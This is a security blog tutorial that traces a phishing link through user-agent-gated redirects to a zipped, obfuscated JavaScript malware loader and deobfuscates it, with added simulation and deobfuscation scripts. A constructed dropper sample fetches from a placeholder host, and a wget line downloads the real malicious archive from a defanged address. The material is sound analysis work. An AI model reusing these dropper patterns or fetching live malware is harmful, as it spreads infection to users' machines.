Deobfuscate JavaScript from the command line made easy

When you work in the security industry, you sometimes receive targeted email attacks. By that we mean a specially crafted email from an apparently known sender (someone you know who also works in the security industry), with a subject tied to work you may be doing, and containing nothing but a link to a document "for review". That is not too bad: a quick look at the email headers tells you the sender is spoofed. Still, we wanted to have a look at this nasty link. Who knows, the malware might be new?

Requirements

As always with Metabrik, you have to install the Briks required for the task. Please install The Metabrik Platform first if you don't have it yet. Once done, load and configure the required Briks:

use brik::tool
run brik::tool install client::www
run brik::tool install string::javascript

Ready to start digging

Now that you have the base Briks installed, just copy the link and save it to a Variable in The Metabrik Shell:

my $link = 'hxxp://<redacted1>.com/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/'

Chances are this link will redirect a few times before landing on the malware loader. Use the get Command to analyse what this page contains:

run client::www get $link

You see, there is a JavaScript redirection pointing to another page on the same website. Let’s see what it shows:

my $link2 = 'hxxp://<redacted1>.com/wt/reports/go.php?p=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/'
run client::www get $link2

As you can see, we now get a 404 error. At the time of writing, the malicious website no longer leads to the malcode. Fortunately, we did take some notes during the first analysis. You will have to trust us when we say that, at some point, we reached a final go.php script rendering HTML that stated:

<meta http-equiv='refresh' content='3;url=https://www.google.com/drive/'><br><center><b>Only available for Windows</b></center>

No worries: the page is gated on the User-Agent, so just change it and start again, this time with the trace_redirect Command. Note that set only changes the user_agent Attribute; reset_user_agent is run afterwards so the underlying client picks up the new value before the next request:

set client::www user_agent "Mozilla/5.0 (Windows NT x.y; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0"
run client::www reset_user_agent
run client::www trace_redirect $link2
[
  {
    code => 302,
    location => "hxxp://<redacted2>.com/s/index.php?q=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
    uri => "hxxp://<redacted1>.com/wt/reports/go.php?p=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
  },
  {
    code => 200,
    uri => "hxxp://<redacted2>.com/s/index.php?q=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
  },
]

We end up with the target malicious loader link. Let's save the uri key of the last element of the previous run Command's result (held in $RUN) into a $link3 Variable:

my $link3 = $RUN->[-1]{uri}
run client::www get $link3
{
  code => 200,
  content => "<title>Doc file 'GomoR' doc</title> <body bgcolor='#ffffff'>
<iframe src='https://www.google.com/drive/' height='100%' width='100%' scrolling='no' border=0></iframe>
<iframe src='view/GomoR.doc.zip' height=3 width=3></iframe>
<meta http-equiv='refresh' content='5;url=https://www.google.com/drive/'>",
  headers => {
    "client-date" => "Mon, 13 Feb 2017 07:20:55 GMT",
    "client-peer" => "XX.YY.ZZ.79:80",
    "client-response-num" => 1,
    "connection" => "close",
    "content-encoding" => "gzip",
    "content-length" => 206,
    "content-type" => "text/html; charset=UTF-8",
    "date" => "Mon, 13 Feb 2017 07:20:54 GMT",
    "server" => "Apache",
    "vary" => "Accept-Encoding",
  },
}

The code is not far away now. The page embeds the relative URL view/GomoR.doc.zip inside a 3x3 pixel iframe, which resolves against hxxp://<redacted2>.com/s/. Let's download it with wget:

wget 'hxxp://<redacted2>.com/s/view/GomoR.doc.zip'
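The chain above can be reproduced offline. What follows is an added example, not part of the original post and not Metabrik code: a small Node.js script that follows HTTP Location headers, meta refresh tags and JavaScript location assignments, with a hop limit and loop detection, and that flags tiny iframes of the kind that staged the ZIP. Every response is a constructed stand-in modelled on the ones shown above; the hostnames redacted1.example and redacted2.example and the shortened query path are placeholders, and the decoy Google Drive page is simulated rather than fetched.

```javascript
// Added example (not from the post, not Metabrik code): follow a redirect
// chain offline, honouring the User-Agent gate seen above. Every response
// below is CONSTRUCTED to mirror the hops in the post; redacted1.example,
// redacted2.example and the shortened path are placeholders.

const WINDOWS_UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0';
const LINUX_UA = 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0';
const START = 'http://redacted1.example/88976189/';

// Constructed stand-in for the two malicious hosts and the decoy landing page.
const FAKE_SERVER = {
  [START]: () => ({
    code: 200, headers: {},
    content: "<script>window.location.href='/wt/reports/go.php?p=/88976189/';</script>",
  }),
  'http://redacted1.example/wt/reports/go.php?p=/88976189/': (ua) =>
    /Windows/.test(ua)
      ? { code: 302, headers: { location: 'http://redacted2.example/s/index.php?q=/88976189/' }, content: '' }
      : { code: 200, headers: {}, content: "<meta http-equiv='refresh' content='3;url=https://www.google.com/drive/'>"
          + '<br><center><b>Only available for Windows</b></center>' },
  'http://redacted2.example/s/index.php?q=/88976189/': () => ({
    code: 200, headers: {},
    content: "<title>Doc file 'GomoR' doc</title> <body bgcolor='#ffffff'>\n"
      + "<iframe src='https://www.google.com/drive/' height='100%' width='100%' scrolling='no' border=0></iframe>\n"
      + "<iframe src='view/GomoR.doc.zip' height=3 width=3></iframe>\n"
      + "<meta http-equiv='refresh' content='5;url=https://www.google.com/drive/'>",
  }),
  'https://www.google.com/drive/': () => ({ code: 200, headers: {}, content: '<html>decoy (stand-in)</html>' }),
};

function fakeFetch(url, ua) {
  const handler = FAKE_SERVER[url];
  return handler ? handler(ua) : { code: 404, headers: {}, content: '' };
}

// Next hop from one response: Location header, <meta refresh>, or a JS location assignment.
function nextHop(resp, currentUrl) {
  if (resp.code >= 300 && resp.code < 400 && resp.headers.location) {
    return new URL(resp.headers.location, currentUrl).href;
  }
  const html = resp.content || '';
  const meta = html.match(/<meta[^>]+http-equiv=['"]?refresh['"]?[^>]+content=['"]\s*\d+\s*;\s*url=([^'"]+)['"]/i);
  if (meta) return new URL(meta[1], currentUrl).href;
  const js = html.match(/(?:window\.|document\.)?location(?:\.href)?\s*=(?!=)\s*['"]([^'"]+)['"]/i)
          || html.match(/location\.(?:replace|assign)\(\s*['"]([^'"]+)['"]\s*\)/i);
  if (js) return new URL(js[1], currentUrl).href;
  return null;                                   // final page: nothing sends us on
}

// Walk the chain; stop on a dead end, a loop, or the hop limit.
function traceRedirects(startUrl, ua, fetch = fakeFetch, maxHops = 10) {
  const hops = [];
  const seen = new Set();
  let url = startUrl;
  while (url && !seen.has(url) && hops.length < maxHops) {
    seen.add(url);
    const resp = fetch(url, ua);
    hops.push({ code: resp.code, uri: url });
    url = nextHop(resp, url);
  }
  return hops;
}

// Tiny iframes are where the payload is staged; resolve their src against the page URL.
function hiddenIframeSources(html, baseUrl) {
  const out = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = m[1].match(/\bsrc=['"]([^'"]+)['"]/i);
    const h = m[1].match(/\bheight=['"]?(\d+)/i);
    const w = m[1].match(/\bwidth=['"]?(\d+)/i);
    if (src && h && w && Number(h[1]) <= 10 && Number(w[1]) <= 10) out.push(new URL(src[1], baseUrl).href);
  }
  return out;
}

// Same chain, two user agents: only the Windows one reaches the loader page.
for (const ua of [LINUX_UA, WINDOWS_UA]) {
  const hops = traceRedirects(START, ua);
  console.log(ua.includes('Windows') ? 'Windows UA:' : 'Linux UA:', hops);
  const loader = hops.find((hop) => hop.uri.includes('/s/index.php'));
  if (loader) console.log('hidden iframe(s):', hiddenIframeSources(fakeFetch(loader.uri, ua).content, loader.uri));
}
```

Run it with node: the same chain is walked twice, once with a Linux user agent (which ends on the "Only available for Windows" page and its decoy) and once with the Windows one (which gets the 302 and reaches the loader page). Unlike trace_redirect in the post, which only followed HTTP redirects, this also follows in-page redirects, so the loader page's own meta refresh to the decoy shows up as a final hop; the staged ZIP is found by looking at the iframes of the page before that hop, not at the end of the chain.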

Now for the fun part

Let's have a look at this so-called ZIP file with the file::type Brik:

use file::type
run file::type get_types GomoR.doc.zip
mkdir zip
cd zip/
unzip ../GomoR.doc.zip
ls GomoR.doc.*
run file::type get_types $RUN

As it appears to be a legit ZIP file, we unzipped it and then analyzed the files contained in the archive. We have a .js file: this is our malcode loader. Let's show it:

less GomoR.doc.js

Typical obfuscated JavaScript. As we are lazy and don't want to deobfuscate it by hand, let's use the file::text Brik along with the string::javascript Brik:

use file::text
use string::javascript
run file::text read GomoR.doc.js
run string::javascript deobfuscate $RUN

It is nearly readable. Save it to a file and display it with less:

run file::text write $RUN gomor.js
less gomor.js

Far better. We finally have the link to our malicious code \o/
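For readers who want to see what a deobfuscation pass actually does, here is an added example; it is neither the string::javascript Brik nor the real GomoR.doc.js. It implements a few static rewriting passes in Node.js for the idioms such droppers rely on: String.fromCharCode() calls, "a" + "b" concatenations, a shared string array indexed everywhere, single-assignment string variables and obj["member"] access. The obfuscated sample is constructed for the demo and the host redacted3.example is a placeholder; nothing in it is executed, only rewritten.

```javascript
// Added example, not the string::javascript Brik and not the real GomoR.doc.js:
// static rewriting passes for the idioms mail-borne JScript droppers use.
// SAMPLE is constructed for the demo; redacted3.example is a placeholder host.
// The code is only rewritten, never executed.

const SAMPLE = `
var _0xab = ["WScript", "Shell", "Scr" + "ipt" + "ing.FileSystemObject", "MSXML2.XMLHTTP", "GET", "ADODB.Stream"];
var h = String.fromCharCode(104, 116, 116, 112, 58, 47, 47);
var u = h + "redacted3.example" + "/" + "get" + ".php?id=" + _0xab[4];
var o = WScript["CreateObject"](_0xab[3]);
o["open"](_0xab[4], u, false);
var s = WScript.CreateObject(_0xab[5]);
eval(_0xab[0] + "." + _0xab[1]);
`;

// One string literal, either quote style, no capturing group so it can be embedded.
const LIT = String.raw`"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'`;
const IDENT = String.raw`[A-Za-z_$][\w$]*`;
const LIT_RE = new RegExp(LIT, 'g');
const SPLIT_RE = new RegExp(`(${LIT})`);   // split() keeps the literals at odd indices

function unescapeLit(s) {
  const map = { n: '\n', t: '\t', r: '\r', '0': '\0' };
  return s.replace(/\\(.)/g, (_, c) => (c in map ? map[c] : c));
}
function litValue(lit) { return unescapeLit(lit.slice(1, -1)); }

// Run a regex replacement on the code while leaving the inside of string literals alone.
function replaceOutsideStrings(code, re, repl) {
  return code.split(SPLIT_RE).map((part, i) => (i % 2 ? part : part.replace(re, repl))).join('');
}

// Pass 1: String.fromCharCode(104, 116, ...) -> "ht..."
function foldFromCharCode(code) {
  return code.replace(/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g, (_, nums) =>
    JSON.stringify(String.fromCharCode(...nums.split(',').map((n) => parseInt(n, 10)))));
}

// Pass 2: "a" + "b" -> "ab", one pair at a time until nothing is left to join.
const JOIN_RE = new RegExp(String.raw`(${LIT})\s*\+\s*(${LIT})`);
function joinLiterals(code) {
  let prev;
  do {
    prev = code;
    code = code.replace(JOIN_RE, (_, a, b) => JSON.stringify(litValue(a) + litValue(b)));
  } while (code !== prev);
  return code;
}

// Pass 3: var _0xab = ["x", "y"]; ... _0xab[1] -> "y"
const ARRAY_RE = new RegExp(
  String.raw`var\s+(${IDENT})\s*=\s*\[\s*((?:(?:${LIT})\s*,\s*)*(?:${LIT}))\s*\]\s*;`, 'g');
function inlineStringArrays(code) {
  const arrays = {};
  code = code.replace(ARRAY_RE, (_, name, body) => {
    arrays[name] = (body.match(LIT_RE) || []).map(litValue);
    return `/* inlined ${name} (${arrays[name].length} strings) */`;
  });
  for (const [name, items] of Object.entries(arrays)) {
    const ref = new RegExp(String.raw`\b${name.replace(/\$/g, '\\$')}\[(\d+)\]`, 'g');
    code = replaceOutsideStrings(code, ref, (m, i) => (Number(i) < items.length ? JSON.stringify(items[Number(i)]) : m));
  }
  return code;
}

// Pass 4: var h = "lit"; assigned exactly once -> later uses of h become "lit".
const DECL_RE = new RegExp(String.raw`var\s+(${IDENT})\s*=\s*(${LIT})\s*;`, 'g');
function propagateConstants(code) {
  for (const [, name, lit] of [...code.matchAll(DECL_RE)]) {
    const esc = name.replace(/\$/g, '\\$');
    const assigns = code.match(new RegExp(String.raw`\b${esc}\s*=[^=]`, 'g')) || [];
    if (assigns.length !== 1) continue;                 // reassigned somewhere: not a constant
    const use = new RegExp(String.raw`(^|[^.\w$])${esc}(?![\w$]|\s*=[^=])`, 'g');
    code = replaceOutsideStrings(code, use, (m, pre) => pre + lit);
  }
  return code;
}

// Pass 5: obj["member"] -> obj.member (only right after an identifier, ')' or ']').
function dotMembers(code) {
  return code.replace(/([\w$)\]])\[\s*(["'])([A-Za-z_$][\w$]*)\2\s*\]/g, '$1.$3');
}

// Passes feed each other (an inlined array element may join with its neighbour,
// a joined string may become a constant), so iterate to a fixed point.
function deobfuscate(code) {
  let prev;
  do {
    prev = code;
    code = joinLiterals(propagateConstants(inlineStringArrays(joinLiterals(foldFromCharCode(code)))));
  } while (code !== prev);
  return dotMembers(code);
}

// The first thing an analyst wants: URLs that are only visible after rewriting.
function extractUrls(code) {
  const vals = (code.match(LIT_RE) || []).map(litValue);
  return [...new Set(vals.filter((v) => /^https?:\/\/[^\s/]+/i.test(v)))];
}

console.log(deobfuscate(SAMPLE));
console.log('URLs:', extractUrls(deobfuscate(SAMPLE)));
```

Run it with node to see the rewritten script and the download URL that only exists once the passes have been applied: the String.fromCharCode() scheme, the array lookups and the concatenations collapse into a single "http://..." literal that is then propagated into the open() call. It is a regex rewriter rather than a parser, so it can misalign on quotes inside comments or on escape sequences it does not know; for anything beyond these common dropper idioms, hand the result to a real JavaScript parser, or run it in a sandboxed interpreter with WScript and ActiveXObject hooked to log what the loader tries to do.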

Conclusion

We have shown how to use The Metabrik Platform as the primary way of digging into a suspicious link. Now we want to dig into this executable and, of course, we have Briks for that. Well, sort of: some are not yet written but are in the pipeline. Come and see us at the next TROOPERS conference, where we have been scheduled for a one-hour talk and will demonstrate what can be done to reverse engineer (or at least dig a little into) the malware with no l33t skills.